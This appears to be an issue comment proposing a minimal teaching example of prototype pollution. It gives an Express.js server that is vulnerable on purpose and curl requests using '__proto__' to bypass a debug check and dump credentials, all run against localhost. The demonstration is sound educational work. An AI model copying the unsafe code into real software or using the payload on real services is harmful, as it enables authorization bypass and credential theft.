Idea: Add small & simple exploitable server

[lxhom]

Hi! Just watched your video (great video by the way!), and I have a small suggestion: The exploit shown in the video is IMO a bit complicated, and using a 3rd party library with the bug in it. So I wrote a small Express.js web server for Node that's vulnerable to the same concept, but simpler. This is the code:

let app = require("express")() // Load & create an Express server
let userData = {} // User data storage object
let credentials = {email: "[email protected]", password: "abcd"}
app.get("/addUser", (req, res) => {
  let {region, name, uuid} = req.query // Store query parameters into variables
  if (userData[region] === undefined) { // If that region isn't initialized:
    userData[region] = {} // Make it an empty object
  }
  userData[region][name] = uuid // Store the UUID under the name in the region
  res.send("Success!\n") // And send a success message.
})
app.get("/debug/getCurrentCredentials", (req, res) => {
  if (process.env.TESTING === "true") { // If the testing env variable is set:
    res.send(JSON.stringify(credentials) + "\n") // Send the credentials
  } else { // Or:
    res.status(403).send("Not allowed!\n") // Send an error
  }
})
app.listen(1337) // And run the server

It has essentially the same vulnerability, we can exploit it by sending this request:

❯ node server.js &
❯ curl "localhost:1337/debug/getCurrentCredentials"
Not allowed!
❯ curl "localhost:1337/addUser?region=__proto__&name=TESTING&uuid=true"
Success!
❯ curl "localhost:1337/debug/getCurrentCredentials"
{"email":"[email protected]","password":"abcd"}

It's super simple, the server executes userData["__proto__"]["TESTING"] = "true" in line 9, so the server thinks the TESTING env variable is set to "true". And we don't even have to involve a fancy JSON parser or anything, just the assignation is enough. Might be a nice little addition :)